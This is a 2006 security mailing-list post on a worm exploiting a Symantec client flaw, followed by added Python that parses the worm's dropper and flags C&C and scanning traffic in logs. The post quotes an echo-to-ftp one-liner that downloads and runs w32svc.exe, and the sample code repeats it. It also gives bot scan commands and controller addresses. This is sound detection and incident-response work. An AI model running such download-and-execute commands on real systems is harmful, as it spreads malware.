[unisog] Worm exploiting Symantec client defect?????

Cam Beasley cam at austin.utexas.edu
Mon Nov 27 22:44:45 GMT 2006


- a reptile bot it seems
- uses VMware and debugger detection
- IRC Based C&C with a modified version of UnrealIRCD
- Ops go by god and G00D
- the botnet controller was at 38.118.143.201:6667
  but just recently jumped to 64.143.184.7:6667
- initial attack vectors target tcp/2967 & tcp/6236
- compromised hosts participate in a NetBIOS & VNC scan of
  local networks
- common bot commands are:
  .asc -S -s
  .asc mass445 100 5 0 -b -r -e -h
  .asc rtvscan 100 5 0
- malcode is transferred thusly:
  echo open X.X.X.X 2100 >i&echo user 1 1 >>i&echo get w32svc.exe >>i&echo quit >>i&ftp -As:i&w32svc.exe&exit
- w32svc.exe is dumped to C:\Program Files\Symantec AntiVirus
- Symantec wasn't identifying the malcode 'w32svc.exe' the
  last time I checked...

~cam.





On 11/27/06 4:22 PM, "Gary Flynn" <flynngn at jmu.edu> wrote:

> Anyone know anything more about what SANS
> is reporting on this?
> 
> http://isc.sans.org//index.php
> 

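The message above gives its indicators in prose. The Python below is an added example for readers of the archive, not code from the original post or from any vendor; it turns those indicators into two checks a responder can run offline. The first rebuilds the ftp script that the quoted "echo ... >i & ftp -As:i" one-liner writes to disk and reports what it fetches and executes (the server address is redacted in the post, so the sample uses a documentation-range address, 192.0.2.10). The second walks outbound connection records and flags hosts talking to the listed controllers on 6667 and hosts sweeping the local network on the NetBIOS and VNC ports. The sample connection records and the fan-out threshold of ten distinct destinations are constructed for the example.

```python
import re
from collections import defaultdict

# Indicators as given in the post. The controller had already moved once
# when it was written, so treat the addresses as a point-in-time list.
C2_HOSTS = {"38.118.143.201", "64.143.184.7"}
C2_PORT = 6667
ATTACK_PORTS = {2967, 6236}        # initial attack vectors named in the post
LATERAL_PORTS = {139, 445, 5900}   # NetBIOS and VNC sweep of local networks

# One fragment of the dropper one-liner: "echo <ftp command> >file" or ">>file"
REDIRECT = re.compile(r"^\s*echo\s+(.*?)\s*>{1,2}\s*(\S+)\s*$")


def parse_ftp_dropper(cmdline):
    """Rebuild the ftp script that an 'echo ... >i & ftp -s:i' one-liner
    writes, and report the server, credentials, downloads and what runs after."""
    scripts = defaultdict(list)   # script file name -> ftp commands, in order
    other = []                    # non-echo fragments: ftp, the payload, exit
    for part in cmdline.split("&"):
        part = part.strip()
        if not part:
            continue
        m = REDIRECT.match(part)
        if m:
            scripts[m.group(2)].append(m.group(1))
        else:
            other.append(part)

    info = {"server": None, "port": 21, "user": None, "password": None,
            "downloads": [], "executes": []}
    script_name = None
    for cmd in other:
        toks = cmd.split()
        if toks[0].lower() == "ftp":
            for tok in toks[1:]:
                # accepts "-s:i" and the fused "-As:i" seen in the post
                m = re.match(r"-[A-Za-z]*s:(\S+)$", tok)
                if m:
                    script_name = m.group(1)
        elif toks[0].lower() != "exit":
            info["executes"].append(toks[0])

    for line in scripts.get(script_name, []):
        toks = line.split()
        verb = toks[0].lower()
        if verb == "open" and len(toks) > 1:
            info["server"] = toks[1]
            if len(toks) > 2 and toks[2].isdigit():
                info["port"] = int(toks[2])
        elif verb == "user" and len(toks) > 1:
            info["user"] = toks[1]
            if len(toks) > 2:
                info["password"] = toks[2]
        elif verb in ("get", "mget"):
            info["downloads"].extend(toks[1:])
    return info


def triage_connections(records, scan_threshold=10):
    """records: iterable of (src_ip, dst_ip, dst_port) outbound attempts from a
    flow or firewall log. Returns (hosts talking to the C&C, hosts whose fan-out
    on the attack/lateral ports reaches scan_threshold distinct destinations)."""
    c2_talkers = set()
    fanout = defaultdict(set)   # (src, port) -> distinct destinations
    for src, dst, port in records:
        if dst in C2_HOSTS and port == C2_PORT:
            c2_talkers.add(src)
        if port in ATTACK_PORTS or port in LATERAL_PORTS:
            fanout[(src, port)].add(dst)
    scanners = defaultdict(dict)
    for (src, port), dsts in fanout.items():
        if len(dsts) >= scan_threshold:
            scanners[src][port] = len(dsts)
    return c2_talkers, dict(scanners)


# Constructed sample: the one-liner from the post with the redacted server
# replaced by an RFC 5737 documentation address.
SAMPLE_CMD = ("echo open 192.0.2.10 2100 >i&echo user 1 1 >>i"
              "&echo get w32svc.exe >>i&echo quit >>i&ftp -As:i&w32svc.exe&exit")

# Constructed sample log: 10.1.1.5 joins the C&C and sweeps the /24,
# 10.1.1.9 is a normal host with one SMB session and an unrelated IRC connection.
SAMPLE_RECORDS = (
    [("10.1.1.5", "64.143.184.7", 6667)]
    + [("10.1.1.5", "10.1.1.%d" % n, p) for n in range(1, 41) for p in (139, 445, 5900)]
    + [("10.1.1.9", "10.1.1.20", 445), ("10.1.1.9", "10.1.1.20", 6667)]
)

if __name__ == "__main__":
    print(parse_ftp_dropper(SAMPLE_CMD))
    print(triage_connections(SAMPLE_RECORDS))
```

The parser keys off the redirect target rather than the file name "i", so a variant that names its script differently or uses "-s:" without "-A" still parses; the scan check counts distinct destinations per port rather than raw packets, which is what separates a sweep from a busy but legitimate file-server client.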